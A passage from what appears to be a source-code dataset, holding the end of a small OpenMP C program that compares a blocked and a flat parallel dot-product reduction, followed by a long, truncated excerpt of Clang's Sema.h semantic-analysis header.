device constructs have been lowered to nested host-side parallel-for loops)
*/
#include <omp.h>
int main(int argc,char *argv[])
{
int i;
int i2;
int len = 2560;
double sum = 0.0;
double sum2 = 0.0;
double a[len];
double b[len];
/*Initialize with some values*/
#pragma omp parallel for private (i)
for (i = 0; i <= len - 1; i += 1) {
a[i] = ((double )i) / 2.0;
b[i] = ((double )i) / 3.0;
}
#pragma omp parallel for private (i,i2) reduction (+:sum)
for (i2 = 0; i2 <= len - 1; i2 += 256) {
#pragma omp parallel for private (i) reduction (+:sum)
for (i = i2; i <= ((i2 + 256 < len?i2 + 256 : len)) - 1; i += 1) {
sum += a[i] * b[i];
}
}
/* CPU reference computation */
#pragma omp parallel for private (i) reduction (+:sum2) firstprivate (len)
for (i = 0; i <= len - 1; i += 1) {
sum2 += a[i] * b[i];
}
printf("sum=%lf sum2=%lf\n",sum,sum2);
return 0;
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/ASTFwd.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprConcepts.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExprOpenMP.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenCLOptions.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/SemaConcept.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
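/// Usage sketch (illustrative; NullMap is a hypothetical instance): repeated
/// subscripting with one FileID is served from the single-element cache, so
///   NullMap[FID].SawTypeNullability = true;
/// followed by further NullMap[FID] lookups touches the underlying DenseMap
/// at most once per change of file.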
/// Keeps track of the expected type during expression parsing. The type is
/// tied to a particular token; all functions that update or consume the type
/// take the start location of the token they are looking at as a parameter.
/// This allows the parser to avoid updating the type on hot paths.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this function, as it stores a
/// function_ref; clients should make sure all calls to get() with the same
/// location happen while the function_ref is alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
/// Source of additional semantic information.
ExternalSemaSource *ExternalSource;
/// Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
/// The maximum alignment, same as in llvm::Value. We duplicate them here
/// because that allows us not to duplicate the constants in clang code,
/// which we would otherwise have to do, since we can't directly use the llvm
/// constants.
/// The value is verified against llvm here: lib/CodeGen/CGDecl.cpp
///
/// This is the greatest alignment value supported by load, store, and alloca
/// instructions, and global values.
static const unsigned MaxAlignmentExponent = 29;
static const unsigned MaximumAlignment = 1u << MaxAlignmentExponent;
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions FPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method() {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
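// Illustrative sketch of how a pragma handler might drive a PragmaStack
// (location and values are hypothetical; PackStack is declared below):
//
//   // #pragma pack(push, 8)
//   PackStack.Act(PragmaLoc, PSK_Push_Set, /*StackSlotLabel=*/"", 8u);
//   // #pragma pack(pop)
//   PackStack.Act(PragmaLoc, PSK_Pop, /*StackSlotLabel=*/"", 0u);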
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
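// Illustrative use from the parser: push sentinel slots on all MS #pragma
// stacks for the duration of a C++ method body, popping them automatically
// on scope exit (slot label is hypothetical):
//
//   Sema::PragmaStackSentinelRAII
//       PragmaRAII(Actions, "InternalPragmaState", IsCXXMethod);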
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression.
SmallVector<ExprWithCleanups::CleanupObject, 8> ExprCleanupObjects;
/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
/// The index of the first FunctionScope that corresponds to the current
/// context.
unsigned FunctionScopesStart = 0;
ArrayRef<sema::FunctionScopeInfo*> getFunctionScopes() const {
return llvm::makeArrayRef(FunctionScopes.begin() + FunctionScopesStart,
FunctionScopes.end());
}
/// Stack containing information needed when, in C++2a, an 'auto' is
/// encountered in a function declaration parameter type specifier, in order
/// to invent a corresponding template parameter in the enclosing abbreviated
/// function template. This information is also present in LambdaScopeInfo,
/// stored in the FunctionScopes stack.
SmallVector<InventedTemplateParameterInfo, 4> InventedParameterInfos;
/// The index of the first InventedParameterInfo that refers to the current
/// context.
unsigned InventedParameterInfosStart = 0;
ArrayRef<InventedTemplateParameterInfo> getInventedParameterInfos() const {
return llvm::makeArrayRef(InventedParameterInfos.begin() +
InventedParameterInfosStart,
InventedParameterInfos.end());
}
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list of all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of the translation unit.
///
/// This list maps class member fields to the locations of delete-expressions
/// for which we could not prove whether they mismatch the new-expression
/// used in the field's initializer.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations for which we have
/// already emitted a list of pure virtual functions. Used to prevent
/// emitting the same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encountered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and for which a warning must be issued if they remain unused. Only
/// contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
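// Illustrative sketch: delay diagnostics into a local pool while parsing a
// declaration, then decide later whether to emit them.
//
//   sema::DelayedDiagnosticPool Pool(DelayedDiagnostics.getCurrentPool());
//   DelayedDiagnosticsState State = DelayedDiagnostics.push(Pool);
//   ... parse the declaration ...
//   DelayedDiagnostics.popWithoutEmitting(State);
//   // Diagnostics collected in 'Pool' can now be emitted or dropped.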
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
unsigned SavedFunctionScopesStart;
unsigned SavedInventedParameterInfosStart;
public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride),
SavedFunctionScopesStart(S.FunctionScopesStart),
SavedInventedParameterInfosStart(S.InventedParameterInfosStart)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
// Any saved FunctionScopes do not refer to this context.
S.FunctionScopesStart = S.FunctionScopes.size();
S.InventedParameterInfosStart = S.InventedParameterInfos.size();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
S.FunctionScopesStart = SavedFunctionScopesStart;
S.InventedParameterInfosStart = SavedInventedParameterInfosStart;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
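// Illustrative sketch: temporarily enter a declaration context; the previous
// context and its delayed-diagnostics state are restored when the RAII
// object is destroyed (or pop() is called explicitly).
//
//   {
//     ContextRAII SavedContext(*this, NewDC);
//     ... process declarations belonging to NewDC ...
//   } // CurContext, FunctionScopesStart, etc. restored here.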
/// Whether the AST is currently being rebuilt to correct immediate
/// invocations. Immediate invocation candidates and references to consteval
/// functions aren't tracked when this is set.
bool RebuildingImmediateInvocation = false;
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
FD->setWillHaveBody(false);
